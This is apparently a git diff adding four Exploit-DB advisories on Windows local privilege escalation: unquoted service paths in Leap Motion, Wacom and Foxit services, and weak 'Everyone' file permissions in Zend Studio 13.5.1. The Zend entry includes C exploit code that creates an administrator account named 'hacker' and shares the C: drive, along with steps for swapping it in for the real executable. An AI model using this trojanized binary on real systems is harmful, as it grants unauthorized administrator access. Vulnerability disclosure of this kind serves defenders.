+ + + + +*####################################################################* diff --git a/platforms/windows/local/40483.txt b/platforms/windows/local/40483.txt new file mode 100755 index 000000000..f0bdee8e3 --- /dev/null +++ b/platforms/windows/local/40483.txt @@ -0,0 +1,29 @@ +Leap service: https://www.leapmotion.com/ +By Ross Marks: http://www.rossmarks.co.uk +Exploit-db: https://www.exploit-db.com/author/?a=8724 +Category: Local +Tested on: Windows 10 x86/x64 + +1) Unquoted Service Path Privilege Escalation + +Leap motion's "LeapService" installs as a service with an unquoted service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system. + +A successful attempt would require the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run with elevated privileges. + +PoC: + +C:\>sc qc LeapService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: leapService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Leap Motion\Core Services\LeapSvc64.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Leap Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/platforms/windows/local/40484.txt b/platforms/windows/local/40484.txt new file mode 100755 index 000000000..0b97b391a --- /dev/null +++ b/platforms/windows/local/40484.txt @@ -0,0 +1,29 @@ +Wacom Consumer Service: http://www.wacom.com +By Ross Marks: http://www.rossmarks.co.uk +Exploit-db: https://www.exploit-db.com/author/?a=8724 +Category: Local +Tested on: Windows 10 x86/x64 + +1) Unquoted Service Path Privilege Escalation + +Wacom's "Wacom Consumer Service" installs as a service with an unquoted service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system. + +A successful attempt would require the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run with elevated privileges. + +PoC: + +C:\>sc qc WTabletServiceCon +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: WTabletServiceCon + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Tablet\Pen\WtabletServiceCon.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wacom Consumer Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/platforms/windows/local/40485.txt b/platforms/windows/local/40485.txt new file mode 100755 index 000000000..0217f5ffc --- /dev/null +++ b/platforms/windows/local/40485.txt @@ -0,0 +1,29 @@ +Foxit Cloud Update Service: https://www.foxitsoftware.com +By Ross Marks: http://www.rossmarks.co.uk +Exploit-db: https://www.exploit-db.com/author/?a=8724 +Category: Local +Tested on: Windows 10 x86/x64 + +1) Unquoted Service Path Privilege Escalation + +Foxit reader's "cloud safe update service" installs as a service with an unquoted service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system. + +A successful attempt would require the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run with elevated privileges. + +PoC: + +C:\>sc qc FoxitCloudUpdateService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: FoxitCloudUpdateService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\FOXIT SOFTWARE\FOXIT READER\Foxit Cloud\FCUpdateService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Foxit Cloud Safe Update Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/platforms/windows/local/40490.txt b/platforms/windows/local/40490.txt new file mode 100755 index 000000000..5fa6b680d --- /dev/null +++ b/platforms/windows/local/40490.txt @@ -0,0 +1,134 @@ +[+] Credits: John Page aka hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/ZEND-STUDIO-PRIVILEGE-ESCALATION.txt + +[+] ISR: ApparitionSec + + + +Vendor: +============ +www.zend.com + + + +Product: +====================== +ZendStudio IDE v13.5.1 + +Zend Studio is the leading PHP IDE. It is the only PHP IDE that combines mobile development with PHP and includes a sample mobile +app with source code. + + + +Vulnerability Type: +===================== +Privilege Escalation + + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +===================== + +ZendStudio IDE uses weak insecure permissions settings on its files/directory as the “Everyone” group has full access on it. +Allowing low privileged users to execute arbitrary code in the security context of ANY other users with elevated privileges +on the affected system. + +"Everyone" encompasses all users who have logged in with a password as well as built-in, non-password protected accounts such as Guest +and LOCAL_SERVICE. + +Any user (even guest) will be able to replace, modify or change the file. This would allow an attacker the ability to inject code or +replace the ZendStudio executable and have it run in the context of the system. + + +e.g. + +c:\Program Files (x86)\Zend\Zend Studio 13.5.1> icacls ZendStudio.exe + +ZendStudio.exe Everyone:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(RX) + + +x86_64 version ... + + +c:\Program Files\Zend>icacls * | more +Zend Studio 13.5.1 Everyone:(F) + Everyone:(OI)(CI)(IO)(F) + NT SERVICE\TrustedInstaller:(I)(F) + NT SERVICE\TrustedInstaller:(I)(CI)(I + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F + BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO + BUILTIN\Users:(I)(RX) + BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + + + +Exploit code(s): +=============== + +1) Compile below 'C' code name it as "ZendStudio.exe" + + +#include + +int main(void){ + system("net user hacker abc123 /add"); + system("net localgroup Administrators hacker /add"); + system("net share SHARE_NAME=c:\ /grant:hacker,full"); + WinExec("C:\\Program Files (x86)\\Zend\\Zend Studio 13.5.1\\~ZendStudio.exe",0); +return 0; +} + + +2) Rename original "ZendStudio.exe" to "~ZendStudio.exe" + + +3) Place our malicious "ZendStudio.exe" in the ZendStudio directory + + +4) Logout and wait for a more privileged user to login and use ZendStudio IDE then BOOM!!!!! later, +go back and login with your shiny new account. + + + +Disclosure Timeline: +======================================== +Vendor Notification: September 30, 2016 +October 8, 2016 : Public Disclosure + + + +Exploitation Technique: +======================= +Local + + + +Severity Level: +=============== +High + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +hyp3rlinx